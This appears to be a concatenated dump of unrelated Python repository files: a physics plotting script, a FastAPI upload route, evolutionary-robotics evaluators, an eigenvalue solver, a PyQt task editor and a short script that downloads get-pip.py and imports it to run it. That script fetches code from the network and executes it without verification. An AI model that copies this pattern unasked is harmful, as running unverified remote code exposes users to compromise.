cov_alpha_fw_list[N_rep])\nalpha = 1+ dalpha\n\nalpha_tot = np.hstack([np.ones_like(t_before), alpha, np.ones_like(t_after)])\nsys = TMM.time_dep(dt*np.ones_like(t), 1/alpha, np.ones_like(t), 1, 1)\npsi_sca = sys.evolution(omega_b)[0][:-1] - np.exp(-1j*omega_b * t)\nP_sca = np.abs(psi_sca)**2\ntrans, reflec = sys.evolution(omega_b)[3:5]\npsi_sca_after = (trans-np.exp(-1j*omega_b*Tp))*np.exp(-1j*omega_b * (t_after-Tp)) + reflec*np.exp(1j*omega_b * (t_after-Tp))\nP_sca_before = np.zeros_like(t_before)\nP_sca_after = np.abs(psi_sca_after)**2\nP_sca_tot = np.hstack([P_sca_before, P_sca, P_sca_after]) \ndepsilon = 1/alpha_tot - 1\nax[2].fill_between(t_tot, np.real(depsilon)/delta, -4, color='grey', edgecolor='k', lw=0.5, alpha=0.4)\nax[2].set(xlabel=r'$t/t_0$', xlim=(-0.5,Tp+1), xticklabels=[],xticks=(0,5,10,15,20),\n ylim=(-3.5,3.5), yticks=(-2,0,2))\nax[2].set_title('Realizations', fontsize=7)\n\nc = cmap1(N_rep/(N_list-1)*0.999)\n\naxt2 = ax[2].twinx()\naxt2.plot(t_tot, P_sca_tot/delta**2, c=c, lw=0.75)\naxt2.set(ylim=(0,np.max(P_sca_tot/delta**2)), yticks=(0, 5, 10), yticklabels=[0, 5, r'10 '])\naxt2.tick_params('y', colors=c)\naxt2.spines[\"right\"].set_edgecolor(c)\n\n\nSrc_Data_2b.append(t_tot)\nSrc_Data_2b.append(np.real(depsilon)/delta)\nSrc_Data_2b.append(P_sca_tot/delta**2)\n\n\nN_rep = 10\nnp.random.seed(2)\ndalpha = np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_fw_list[N_rep])\nalpha = 1+ dalpha\n\nalpha_tot = np.hstack([np.ones_like(t_before), alpha, np.ones_like(t_after)])\nsys = TMM.time_dep(dt*np.ones_like(t), 1/alpha, np.ones_like(t), 1, 1)\npsi_sca = sys.evolution(omega_b)[0][:-1] - np.exp(-1j*omega_b * t)\nP_sca = np.abs(psi_sca)**2\ntrans, reflec = sys.evolution(omega_b)[3:5]\npsi_sca_after = (trans-np.exp(-1j*omega_b*Tp))*np.exp(-1j*omega_b * (t_after-Tp)) + reflec*np.exp(1j*omega_b * (t_after-Tp))\nP_sca_before = np.zeros_like(t_before)\nP_sca_after = np.abs(psi_sca_after)**2\nP_sca_tot = np.hstack([P_sca_before, P_sca, P_sca_after]) \ndepsilon = 1/alpha_tot - 1\nax[3].fill_between(t_tot, np.real(depsilon)/delta, -4, color='grey', edgecolor='k', lw=0.5, alpha=0.4)\nax[3].set(xlabel=r'$t/t_0$', xlim=(-0.5,Tp+1), xticklabels=[],xticks=(0,5,10,15,20),\n ylabel=r'$\\Delta\\epsilon(t)/\\delta$ ', ylim=(-3.5,3.5), yticks=(-2,0,2))\n\nc = cmap1(N_rep/(N_list-1)*0.999)\n\naxt3 = ax[3].twinx()\naxt3.plot(t_tot, P_sca_tot/delta**2, c=c, lw=0.75)\naxt3.set(ylim=(0,np.max(P_sca_tot/delta**2)), yticks=(0,50, 100, 150))\naxt3.set_ylabel(r'$|\\psi_\\mathrm{sca}(t)|^2$', color='k')\naxt3.tick_params('y', colors=c)\naxt3.spines[\"right\"].set_edgecolor(c)\n\n\nSrc_Data_2b.append(np.real(depsilon)/delta)\nSrc_Data_2b.append(P_sca_tot/delta**2)\n\nN_rep = 10\nnp.random.seed(0)\ndalpha = np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_bw_list[N_rep])\nalpha = 1+ dalpha\n\nalpha_tot = np.hstack([np.ones_like(t_before), alpha, np.ones_like(t_after)])\nsys = TMM.time_dep(dt*np.ones_like(t), 1/alpha, np.ones_like(t), 1, 1)\npsi_sca = sys.evolution(omega_b)[0][:-1] - np.exp(-1j*omega_b * t)\nP_sca = np.abs(psi_sca)**2\ntrans, reflec = sys.evolution(omega_b)[3:5]\npsi_sca_after = (trans-np.exp(-1j*omega_b*Tp))*np.exp(-1j*omega_b * (t_after-Tp)) + reflec*np.exp(1j*omega_b * (t_after-Tp))\nP_sca_before = np.zeros_like(t_before)\nP_sca_after = np.abs(psi_sca_after)**2\nP_sca_tot = np.hstack([P_sca_before, P_sca, P_sca_after]) \ndepsilon = 1/alpha_tot - 1\nax[4].fill_between(t_tot, np.real(depsilon)/delta, -4, color='grey', edgecolor='k', lw=0.5, alpha=0.4)\nax[4].set(xlabel=r'$t/t_0$', xlim=(-0.5,Tp+1), xticks=(0,5,10,15,20),\n ylim=(-3.5,3.5), yticks=(-2,0,2))\n\nc = cmap2(N_rep/(N_list-1)*0.999)\n\naxt4 = ax[4].twinx()\naxt4.plot(t_tot, P_sca_tot/delta**2, c=c, lw=0.75)\naxt4.set(ylim=(0,np.max(P_sca_tot/delta**2)), yticks=(0, 50, 100))\naxt4.tick_params('y', colors=c)\naxt4.spines[\"right\"].set_edgecolor(c)\n\nSrc_Data_2b.append(np.real(depsilon)/delta)\nSrc_Data_2b.append(P_sca_tot/delta**2)\n\n\n# Figs 2c & 2d\nP_ctrlfw_fw_mean = np.average(P_ctrlfw_fw_ens, axis=1)\nP_ctrlfw_fw_q1 = np.percentile(P_ctrlfw_fw_ens, 25, axis=1)\nP_ctrlfw_fw_q3 = np.percentile(P_ctrlfw_fw_ens, 75, axis=1)\n\nP_ctrlfw_bw_mean = np.average(P_ctrlfw_bw_ens, axis=1)\nP_ctrlfw_bw_q1 = np.percentile(P_ctrlfw_bw_ens, 25, axis=1)\nP_ctrlfw_bw_q3 = np.percentile(P_ctrlfw_bw_ens, 75, axis=1)\n\nP_ctrlbw_fw_mean = np.average(P_ctrlbw_fw_ens, axis=1)\nP_ctrlbw_fw_q1 = np.percentile(P_ctrlbw_fw_ens, 25, axis=1)\nP_ctrlbw_fw_q3 = np.percentile(P_ctrlbw_fw_ens, 75, axis=1)\n\nP_ctrlbw_bw_mean = np.average(P_ctrlbw_bw_ens, axis=1)\nP_ctrlbw_bw_q1 = np.percentile(P_ctrlbw_bw_ens, 25, axis=1)\nP_ctrlbw_bw_q3 = np.percentile(P_ctrlbw_bw_ens, 75, axis=1)\n\n\n\nax[5].plot(S0*omega_b, 0.25*Int_1d_stat_ctrlfw[:,0]*omega_b*Tp/delta**2, 'orange', lw=0.75, label=r'Eq.(6)')\nax[7].plot(S0*omega_b, 0.25*Int_1d_stat_ctrlfw[:,1]*omega_b*Tp/delta**2, 'orange', lw=0.75, label=r'Eq.(6)')\n\nax[6].plot(S2w*omega_b, 0.25*Int_1d_stat_ctrlbw[:,0]*omega_b*Tp/delta**2, 'orange', lw=0.75, label=r'Eq.(6)')\nax[8].plot(S2w*omega_b, 0.25*Int_1d_stat_ctrlbw[:,1]*omega_b*Tp/delta**2, 'orange', lw=0.75, label=r'Eq.(6)')\n\nfor ii in range(11):\n c1 = cmap1(ii/(N_list-1)*0.999)\n c1_err = 1-(1-np.array(c1[:3]))*0.5\n c2 = cmap2(ii/(N_list-1)*0.999)\n c2_err = 1-(1-np.array(c2[:3]))*0.5\n \n\n ax[5].errorbar(S0[ii]*omega_b, P_ctrlfw_fw_mean[ii]/delta**2, \n yerr=np.array([[P_ctrlfw_fw_mean[ii]-P_ctrlfw_fw_q1[ii]],\n [P_ctrlfw_fw_q3[ii]-P_ctrlfw_fw_mean[ii]]])/delta**2,\n ecolor=c1_err, color=c1, fmt='o', lw=2, ms=2, label='TMM' if ii==0 else None)\n \n ax[7].errorbar(S0[ii]*omega_b, P_ctrlfw_bw_mean[ii]/delta**2, \n yerr=np.array([[P_ctrlfw_bw_mean[ii]-P_ctrlfw_bw_q1[ii]],\n [P_ctrlfw_bw_q3[ii]-P_ctrlfw_bw_mean[ii]]])/delta**2,\n ecolor=c1_err, color=c1, fmt='o', lw=2, ms=2)\n \n ax[6].errorbar(S2w[ii]*omega_b, P_ctrlbw_fw_mean[ii]/delta**2, \n yerr=np.array([[P_ctrlbw_fw_mean[ii]-P_ctrlbw_fw_q1[ii]],\n [P_ctrlbw_fw_q3[ii]-P_ctrlbw_fw_mean[ii]]])/delta**2,\n ecolor=c2_err, color=c2, fmt='o', lw=2, ms=2)\n\n ax[8].errorbar(S2w[ii]*omega_b, P_ctrlbw_bw_mean[ii]/delta**2, \n yerr=np.array([[P_ctrlbw_bw_mean[ii]-P_ctrlbw_bw_q1[ii]],\n [P_ctrlbw_bw_q3[ii]-P_ctrlbw_bw_mean[ii]]])/delta**2,\n ecolor=c2_err, color=c2, fmt='o', lw=2, ms=2)\n\n\nax[5].set_title('Forward control', fontsize=7)\nax[5].set(xlim=np.array([-0.05,1.05])*S0[-1]*omega_b, xticklabels=[], xticks=(0,1,2,3),\n ylim=(0,np.max(P_ctrlfw_fw_q3/delta**2)), ylabel=r'$P_\\mathrm{FW}$', yticks=(0,50,100))\nax[7].set(xlim=np.array([-0.05,1.05])*S0[-1]*omega_b, xlabel=r'$S_0$',xticks=(0,1,2,3),\n ylim=(0,np.max(P_ctrlfw_bw_q3/delta**2)), ylabel=r'$P_\\mathrm{BW}$', yticks=(0,0.5,1), yticklabels=['0.0',0.5,' 1.0'])\n\nax[5].legend(frameon=False, fontsize=6, loc=2)\n\n\nax[6].set_title('Backward control', fontsize=7)\nax[6].set(xlim=np.array([-0.05,1.05])*S2w[-1]*omega_b, xticklabels=[],xticks=(0,1,2),\n ylim=(0,np.max(P_ctrlbw_fw_q3/delta**2)), yticks=(0,0.5,1, 1.5))\nax[8].set(xlim=np.array([-0.05,1.05])*S2w[-1]*omega_b, xlabel=r'$S_{2\\omega}$', xticks=(0,1,2),\n ylim=(0,np.max(P_ctrlbw_bw_q3/delta**2)), yticks=(0,25,50,75), yticklabels=[0,25,50,' 75'])\n\nfig.savefig('fig2.pdf', format='pdf', dpi=1200)\n\n\n\n#%% Source Data\n\n\nSrc_Data_2b = np.column_stack(Src_Data_2b)\nColumn_names = ['t', \n '(A) Delta_epsilon/delta', '(A) |Psi_sca/delta|^2', \n '(B) Delta_epsilon/delta', '(B) |Psi_sca/delta|^2',\n '(D) Delta_epsilon/delta', '(D) |Psi_sca/delta|^2']\nSrc_Data_2b = pd.DataFrame(Src_Data_2b, columns=Column_names)\n\n\nSrc_Data_2c = np.column_stack([S0*omega_b, \n P_ctrlfw_fw_mean/delta**2, P_ctrlfw_fw_q1/delta**2, P_ctrlfw_fw_q3/delta**2, 0.25*Int_1d_stat_ctrlfw[:,0]*omega_b*Tp/delta**2,\n P_ctrlfw_bw_mean/delta**2, P_ctrlfw_bw_q1/delta**2, P_ctrlfw_bw_q3/delta**2, 0.25*Int_1d_stat_ctrlfw[:,1]*omega_b*Tp/delta**2])\nColumn_names = ['S0', \n 'P_FW, mean', 'P_FW, q1', 'P_FW, q3', 'P_FW, Eq.(6)',\n 'P_BW, mean', 'P_BW, q1', 'P_BW, q3', 'P_BW, Eq.(6)']\nSrc_Data_2c = pd.DataFrame(np.real(Src_Data_2c), columns=Column_names)\n\n\nSrc_Data_2d = np.column_stack([S2w*omega_b, \n P_ctrlbw_fw_mean/delta**2, P_ctrlbw_fw_q1/delta**2, P_ctrlbw_fw_q3/delta**2, 0.25*Int_1d_stat_ctrlbw[:,0]*omega_b*Tp/delta**2,\n P_ctrlbw_bw_mean/delta**2, P_ctrlbw_bw_q1/delta**2, P_ctrlbw_bw_q3/delta**2, 0.25*Int_1d_stat_ctrlbw[:,1]*omega_b*Tp/delta**2])\nColumn_names = ['S2w', \n 'P_FW, mean', 'P_FW, q1', 'P_FW, q3', 'P_FW, Eq.(6)',\n 'P_BW, mean', 'P_BW, q1', 'P_BW, q3', 'P_BW, Eq.(6)']\nSrc_Data_2d = pd.DataFrame(np.real(Src_Data_2d), columns=Column_names)\n\n\nwith pd.ExcelWriter(\"SourceData_Fig2.xlsx\") as writer:\n Src_Data_2b.to_excel(writer, index=False, sheet_name=\"Fig. 2b\")\n Src_Data_2c.to_excel(writer, index=False, sheet_name=\"Fig. 2c\")\n Src_Data_2d.to_excel(writer, index=False, sheet_name=\"Fig. 2d\")\n \n \nEns_Data_2c = np.hstack([P_ctrlfw_fw_ens.T, P_ctrlfw_bw_ens.T])\nColumn_names = ['P_FW, S0='+str(round(S0[i]*omega_b,2)) for i in range(11)] + ['P_BW, S0='+str(round(S0[i]*omega_b,2)) for i in range(11)]\nEns_Data_2c = pd.DataFrame(Ens_Data_2c, columns=Column_names)\nEns_Data_2c.to_excel(\"EnsembleData_Fig2c.xlsx\", index=False)\n\nEns_Data_2d = np.hstack([P_ctrlbw_fw_ens.T, P_ctrlbw_bw_ens.T])\nColumn_names = ['P_FW, S2w='+str(round(S2w[i]*omega_b,2)) for i in range(11)] + ['P_BW, S2w='+str(round(S2w[i]*omega_b,2)) for i in range(11)]\nEns_Data_2d = pd.DataFrame(Ens_Data_2d, columns=Column_names)\nEns_Data_2d.to_excel(\"EnsembleData_Fig2d.xlsx\", index=False)\n","repo_name":"jmkim93/Temporal-Scattering","sub_path":"Fig2_target_control.py","file_name":"Fig2_target_control.py","file_ext":"py","file_size_in_byte":21212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40782757539","text":"from fastapi import APIRouter, Depends, UploadFile, File\nfrom fastapi.encoders import jsonable_encoder\nimport os\nfrom fastapi.responses import JSONResponse\n\nfrom server.controllers.graphology_controler import Output\nfrom server.utils.save_file import STATIC_FILE, save_file\nfrom server.utils.train_predict import graphology_prediction\n\nrouter = APIRouter(prefix=\"/services\")\n\n\n@router.post(\"/graphology\")\ndef grapohology_analysis(file: UploadFile = File(None)):\n # try:\n file_name=save_file(file=file)\n prediction= graphology_prediction(file_name=file_name)\n try:\n filepath= STATIC_FILE+file_name\n print(\"+++++++++++++++++++++try remove+++++++++++++++++++++\")\n os.remove(filepath)\n except:\n filepath= STATIC_FILE+\"/\"+file_name\n print(\"+++++++++++++++++++++except remove+++++++++++++++++++++\")\n os.remove(filepath)\n if prediction is None:\n return JSONResponse(\n status_code=200,\n content={\n \"success\": False,\n \"data\": None,\n \"message\": \"Data not available regarding image\",\n \"error\": None,\n },\n )\n else:\n return JSONResponse(\n status_code=200,\n content={\n \"success\": True,\n \"data\": prediction,\n \"message\": \"Analysis of Handwritten Image\",\n \"error\": None,\n },\n )\n # except Exception as e:\n # return JSONResponse(\n # status_code=400,\n # content={\n # \"success\": False,\n # \"data\": None,\n # \"message\": \"Something went wrong\",\n # \"error\": str(e),\n # },\n # )","repo_name":"akshitkhokhani/graphologist-backend","sub_path":"server/routes/graphology.py","file_name":"graphology.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72684118545","text":"import neat\nimport os\nimport evogym.envs\nfrom evogym import is_connected, has_actuator, get_full_connectivity, hashable\nimport numpy as np\nimport pickle as pkl\nimport sys\nsys.path.append('../')\nfrom typing import List\n\nfrom sgr.substrates import morph_substrate\nfrom sgr.generate_robot import generate_robot\nfrom sgr.sgr import SGR\nfrom sgr.body_speciation import CustomGenome\nfrom poet.poet import POET\nfrom dynamic_env.env_config import EnvConfig\nfrom pathos.multiprocessing import ProcessPool\nimport numpy as np\n\nPOET_DIRS = [\n \"new_cppn_1\",\n \"new_3d_1\",\n \"new_cppn_2\", \n \"new_3d_2\",\n \"new_cppn_3\",\n \"new_3d_3\", \n]\n\nMULT_ENV_FILES = [\n \"multiple_env_cppn_1\",\n \"multiple_env_3d_1\",\n \"multiple_env_cppn_2\", \n \"multiple_env_3d_2\",\n \"multiple_env_cppn_3\",\n \"multiple_env_3d_3\", \n]\n\nRESULTS_DIR = os.getcwd() + \"/poet_results\"\nSTEPS = 600\n\n\ndef fit_func_thread(pop, n_steps, env_name, dynamic_env_config=None):\n results_dict = {}\n reward, _ = pop.single_genome_fit(pop.pop.best_genome, n_steps, env_name, dynamic_env_config)\n results_dict[dynamic_env_config.id] = np.round(reward, 4)\n return results_dict\n\ndef multithread_eval(pop: SGR, envs: List[EnvConfig]):\n cpus = len(envs)\n pool = ProcessPool(nodes=5)\n # winner = pop.pop.best_genome\n results_map = pool.amap(\n fit_func_thread,\n [pop for _ in range(cpus)],\n [STEPS for _ in range(cpus)],\n [\"dynamic\" for _ in range(cpus)],\n envs,\n )\n results = results_map.get(timeout=60*10)\n\n fit_dict = {}\n for result_dict in results:\n for k, v in result_dict.items():\n fit_dict[k] = v\n return fit_dict\nclass POET_TEST:\n def __init__(self, test_name, envs) -> None:\n self.test_name = test_name\n self.csvs_dict = {}\n\n self.envs: List[EnvConfig] = envs\n self.dir_path = f\"{os.getcwd()}/../checkpoints/{test_name}\"\n self.create_csv(\"global\")\n\n def evaluate_gen(self, gen):\n file_path = f\"{self.dir_path}/cp_{gen}.pkl\"\n poet_pop: POET = pkl.load(open(file_path, \"rb\"))\n CustomGenome.robot_func = lambda self, net, config: generate_robot(net, poet_pop.run_params.robot_size)\n CustomGenome.substrate = morph_substrate(poet_pop.run_params.robot_size, poet_pop.run_params.substrate_type)\n CustomGenome.robot_size = poet_pop.run_params.robot_size\n CustomGenome.spec_genotype_weight = poet_pop.run_params.spec_genotype_weight\n CustomGenome.spec_phenotype_weight = poet_pop.run_params.spec_phenotype_weight\n\n for p in poet_pop.pairs:\n pop = p.agent_pop\n results = multithread_eval(pop, envs)\n print_results = f\"{gen}; {p.environment.id}; {pop.best_genome.key}\"\n for i in range(0, len(self.envs)):\n print_results += f\"; {results[i]}\"\n self.csvs_dict[\"global\"].write(print_results + \"\\n\")\n print(f\" {p.environment.id}; {pop.best_genome.key}; {results}\")\n\n def create_csv(self, original_env_id):\n csv_file = f\"{RESULTS_DIR}/POET_{self.test_name}_{original_env_id}.csv\"\n csv = open(csv_file, \"w+\")\n header = \"gen;original_env_id;genome_id\"\n for e in self.envs:\n header +=\";env\" + str(e.id) + \"_fit\"\n csv.write(header + \"\\n\")\n self.csvs_dict[original_env_id] = csv\n\nclass MULT_ENV_TEST:\n def __init__(self, test_name, envs) -> None:\n self.test_name = test_name\n self.csvs_dict = {}\n\n self.envs: List[EnvConfig] = envs\n self.dir_path = f\"{os.getcwd()}/../multiple_env_results/{test_name}\"\n self.create_csv(\"global\")\n\n def evaluate_gen(self, gen):\n file_path = f\"{self.dir_path}_pop_gen_{gen}.pkl\"\n pop: SGR = pkl.load(open(file_path, \"rb\"))\n CustomGenome.robot_func = lambda self, net, config: generate_robot(net, pop.robot_size)\n CustomGenome.substrate = morph_substrate(pop.robot_size, pop.substrate_type)\n CustomGenome.robot_size = pop.robot_size\n CustomGenome.spec_genotype_weight = 1\n CustomGenome.spec_phenotype_weight = 2\n\n winner = pop.pop.best_genome\n\n results = multithread_eval(pop, envs)\n print_results = f\"{gen}; 0; {winner.key}\"\n for i in range(0, len(self.envs)):\n print_results += f\"; {results[i]}\"\n self.csvs_dict[\"global\"].write(print_results + \"\\n\")\n print(f\" 0; {winner.key}; {results}\")\n\n def create_csv(self, original_env_id):\n csv_file = f\"{RESULTS_DIR}/MULT_ENV_{self.test_name}_{original_env_id}.csv\"\n csv = open(csv_file, \"w+\")\n header = \"gen;original_env_id;genome_id\"\n for e in self.envs:\n header += \";env\" + str(e.id) + \"_fit\"\n csv.write(header + \"\\n\")\n self.csvs_dict[original_env_id] = csv\n\n\nif __name__ == \"__main__\":\n env0 = EnvConfig(0)\n env1 = env0.create_child()\n env1.mutate_barrier_h(.25)\n env2 = env0.create_child()\n env2.mutate_barrier_h(.25)\n env3 = env1.create_child()\n env3.mutate_barrier_h(.25)\n env4 = env1.create_child()\n env4.mutate_barrier_h(.25)\n env5 = env2.create_child()\n env5.mutate_barrier_h(.25)\n env6 = env2.create_child()\n env6.mutate_barrier_h(.25)\n\n envs = [env0, env1, env2, env3, env4, env5, env6]\n\n for dir, mult_env_file in zip(POET_DIRS, MULT_ENV_FILES):\n\n print(\"initiating test on: \", dir)\n p = POET_TEST(dir, envs)\n for i in range(5, 201, 5):\n print(i)\n p.evaluate_gen(i)\n print()\n for f in p.csvs_dict.values():\n f.close()\n\n print(\"initiating test on: \", mult_env_file)\n p = MULT_ENV_TEST(mult_env_file, envs)\n for i in range(5, 201, 5):\n print(i)\n p.evaluate_gen(i)\n print()\n for f in p.csvs_dict.values():\n f.close()","repo_name":"fhtanaka/SGR","sub_path":"evaluators/poet_evaluator.py","file_name":"poet_evaluator.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15439616625","text":"from ..base import MetricsBase\nfrom modnas.registry.metrics import register\n\n\n@register\nclass ValidateMetrics(MetricsBase):\n \"\"\"Estimator validation metrics class.\"\"\"\n\n def __init__(self, field=None):\n super().__init__()\n self.field = field\n\n def __call__(self, model):\n \"\"\"Return metrics output.\"\"\"\n estim = self.estim\n val_res = estim.valid_epoch(model=model)\n if isinstance(val_res, dict):\n field = self.field\n default_res = list(val_res.values())[0]\n if field is None:\n val_res = default_res\n elif field in val_res:\n val_res = val_res[field]\n else:\n self.logger.error('field \\\"{}\\\" not exists, using default'.format(field))\n val_res = default_res\n return val_res\n","repo_name":"FlowEternal/pointlanenet","sub_path":"model/vega/algorithms/nas/modnas/metrics/predefined/estim.py","file_name":"estim.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25626200079","text":"import argparse\nimport logging\nimport math\nimport profile\n\nfrom matrix import Matrix, Vector\nfrom utils import read_data, save_to_file\n\nfrom numpy.linalg import solve, eig\nimport numpy as np\n#from benchmark import numpy_eig\n\ndef numpy_eigs(matrix, my_values, my_vectors):\n print(\"My eigenvalues:\")\n print(my_values)\n print(\"My eigenvectors:\")\n print(my_vectors)\n\n a = np.array(matrix.get_data())\n eig_np = eig(a)\n print(\"Numpy eigenvalues:\")\n print(eig_np[0].round(3))\n print(\"Numpy eigenvectors:\")\n print(eig_np[1].round(3))\n\n\ndef t(A):\n return math.sqrt(sum([A[i][j] ** 2 for i in range(len(A)) \n for j in range(i + 1, len(A))]))\n\n\ndef indexes_max_elem(A):\n i_max = j_max = 0\n a_max = A[0][0]\n for i in range(len(A)):\n for j in range(i + 1, len(A)):\n if abs(A[i][j]) > a_max:\n a_max = abs(A[i][j])\n i_max, j_max = i, j\n return i_max, j_max\n\n\ndef get_phi(a_ii, a_jj, a_ij):\n return math.pi / 4 if a_ii == a_jj else \\\n 0.5 * math.atan(2 * a_ij / (a_ii - a_jj))\n\n\ndef jacobi_eigenvalue(A, eps):\n sz = len(A)\n A_i = Matrix(A)\n eigenvectors = Matrix.identity(sz)\n\n a = 0\n while True:\n U = Matrix.identity(sz)\n i, j = indexes_max_elem(A_i)\n phi = get_phi(A_i[i][i], A_i[j][j], A_i[i][j])\n U[i][j] = -math.sin(phi)\n U[j][i] = math.sin(phi)\n U[i][i] = U[j][j] = math.cos(phi)\n\n U_T = Matrix(U)\n U_T.transpose()\n A_i = U_T.multiply(A_i.multiply(U))\n\n eigenvectors = eigenvectors.multiply(U)\n\n if t(A_i) < eps:\n break\n a += 1\n\n eigenvalues = A_i.diag()\n return eigenvalues, eigenvectors\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--input', required=True, help='Input file')\n parser.add_argument('--output', required=True, help='Output file')\n args = parser.parse_args()\n\n logging.basicConfig(filename=\"1-4.log\", level=logging.INFO)\n\n need_args = ('matrix', 'eps')\n init_dict = read_data(args.input, need_args)\n A, eps = init_dict['matrix'], init_dict['eps']\n\n values, vectors = jacobi_eigenvalue(A, eps)\n numpy_eigs(A, values, vectors)\n save_to_file(args.output, eigenvalues=values, eigenvectors=vectors)\n\nif __name__ == '__main__':\n profile.run('main()')","repo_name":"Nebezcoda/mai_study","sub_path":"NM/lab1/1-4/jacobi_method.py","file_name":"jacobi_method.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"20902124386","text":"# coding=utf-8\n\nimport os, sys\nimport urllib\n\n# down load get-pip.py\ndef report_hook(count, blockSize, totalSize):\n percent = int(count * blockSize * 100 / totalSize)\n sys.stdout.write(\"\\r%d%%\" % percent + ' completed')\n sys.stdout.flush()\n\nurl = 'https://raw.github.com/pypa/pip/master/contrib/get-pip.py'\nprint('download begin, please wait...')\n\nfile_path, headers = urllib.urlretrieve(url, reporthook = report_hook)\n\nwith open(file_path, \"rb\") as fr:\n data = fr.read()\n\nwith open('./download.py','wb') as fw:\n fw.write(data)\n\nprint('')\nprint('download success, installing...')\n\n# install pip by calling get-pip.py(i.e. download.py)\nimport download\ndownload.main()\n\n\n","repo_name":"zhanglintc/wb","sub_path":"auto_install_pip.py","file_name":"auto_install_pip.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"27459055732","text":"\nfrom PyQt5.QtWidgets import (QFormLayout, QApplication, QWidget, QLabel, QLineEdit, QDialogButtonBox, QDialog, QHBoxLayout, QVBoxLayout, QListWidget, QPushButton, QMessageBox)\nfrom PyQt5.QtGui import QIcon, QPalette, QColor\nfrom PyQt5.QtCore import Qt, QModelIndex\n\nfrom datetime import datetime, timedelta\nimport enum\n\nfrom Task import *\nfrom Backlog import *\n\nclass State(enum.Enum):\n\n ADDING_TASK = 0\n DELETE_TASK = 1\n SELECT_TASK = 2\n\nclass EditBacklogGUI(QDialog):\n\n def __init__(self, parent, iBacklog):\n super().__init__(parent)\n\n self.backlog = iBacklog \n\n self.tempoBacklog = copy.deepcopy(self.backlog)\n\n self.currTask = Task()\n\n self.tempoTask = Task()\n\n self.currRowSelected = 0\n\n self.newItemEnum = 0\n\n self.listState = State.SELECT_TASK\n\n self.currTaskErrors = list()\n\n self.initUI()\n\n def initUI(self):\n\n self.setWindowTitle(\"Edit tasks\")\n self.resize(1000, 400)\n\n mainLayout = QVBoxLayout(self)\n listViewTaskViewLayout = QHBoxLayout()\n self.listViewLayout = QVBoxLayout()\n\n self.listTasksView = QListWidget(self)\n \n self.layoutCurrTask = QFormLayout()\n\n self.initCurrTaskLineEdits()\n\n self.addTaskButton = QPushButton(self)\n self.addTaskButton.setIcon(QIcon(\"Images//plus_icon.png\"))\n self.addTaskButton.clicked.connect(self.manageAddTaskClickedButton)\n\n self.deleteTaskButton = QPushButton(self)\n self.deleteTaskButton.setIcon(QIcon(\"Images//minus_icon.png\"))\n self.deleteTaskButton.clicked.connect(self.manageDeleteTaskClickedButton)\n\n self.buttonbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n\n self.buttonbox.accepted.connect(self.accept)\n self.buttonbox.rejected.connect(self.reject)\n\n self.listViewLayout.addWidget(self.listTasksView)\n self.listViewLayout.addWidget(self.addTaskButton)\n self.listViewLayout.addWidget(self.deleteTaskButton)\n\n listViewTaskViewLayout.addLayout(self.listViewLayout)\n listViewTaskViewLayout.addLayout(self.layoutCurrTask)\n\n mainLayout.addLayout(listViewTaskViewLayout)\n mainLayout.addWidget(self.buttonbox)\n\n self.invalidTaskErrMsg = QMessageBox()\n self.invalidTaskErrMsg.setText(\"The current task is invalid.\")\n self.invalidTaskErrMsg.setIcon(QMessageBox.Critical)\n\n self.initListViewOfTasks()\n\n self.updateCurrTaskSelected()\n\n def exec_(self):\n\n self.tempoBacklog = copy.deepcopy(self.backlog)\n\n self.initListViewOfTasks()\n\n self.updateCurrTaskSelected()\n\n self.titleInputErr.setVisible(False)\n self.prjCodeInputErr.setVisible(False)\n \n self.exec()\n\n def initCurrTaskLineEdits(self):\n\n self.titleInputErr = QLabel(self)\n\n self.titleInput = QLineEdit(self)\n self.titleInput.editingFinished.connect(self.manageTitleEntered)\n\n self.prjCodeInputErr = QLabel(self)\n self.prjCodeInput = QLineEdit(self)\n self.completedTime = QLineEdit(self)\n self.estimatedTime = QLineEdit(self)\n self.percAccomplished = QLineEdit(self)\n self.percAccomplished.setEnabled(False)\n\n self.redPalette = QPalette()\n redColor = QColor(255, 0, 0)\n self.redPalette.setColor(QPalette.WindowText, redColor)\n\n self.titleInputErr.setText(\"* A title is required.\")\n self.layoutCurrTask.addWidget(self.titleInputErr)\n self.titleInputErr.setVisible(False)\n self.titleInputErr.setPalette(self.redPalette)\n\n self.layoutCurrTask.addRow(\"Title:\", self.titleInput)\n \n self.prjCodeInputErr.setText(\"* A project code is required.\")\n self.layoutCurrTask.addWidget(self.prjCodeInputErr)\n self.prjCodeInputErr.setVisible(False)\n self.prjCodeInputErr.setPalette(self.redPalette)\n\n self.layoutCurrTask.addRow(\"Project code:\", self.prjCodeInput)\n self.layoutCurrTask.addRow(\"Completed time:\", self.completedTime)\n self.layoutCurrTask.addRow(\"Estimated time:\", self.estimatedTime)\n self.layoutCurrTask.addRow(\"Percentage accomplished:\", self.percAccomplished)\n\n def manageTitleEntered(self):\n\n self.updateTextRowListView(self.currRowSelected, self.titleInput.text())\n \n def manageCurrRowChangeList(self):\n\n prevRowSelected = self.currRowSelected\n self.currRowSelected = self.listTasksView.currentRow()\n\n if self.listState == State.ADDING_TASK:\n pass\n elif self.listState == State.DELETE_TASK:\n pass\n else:\n\n self.updateTaskFromLineEdits(self.tempoTask)\n\n isTaskNotValid = self.tempoBacklog.validateTask(self.tempoTask)\n\n if len(isTaskNotValid):\n self.titleInputErr.setVisible(True)\n self.prjCodeInputErr.setVisible(True)\n self.currRowSelected = prevRowSelected\n self.listTasksView.setCurrentRow(self.currRowSelected)\n\n else:\n self.titleInputErr.setVisible(False)\n 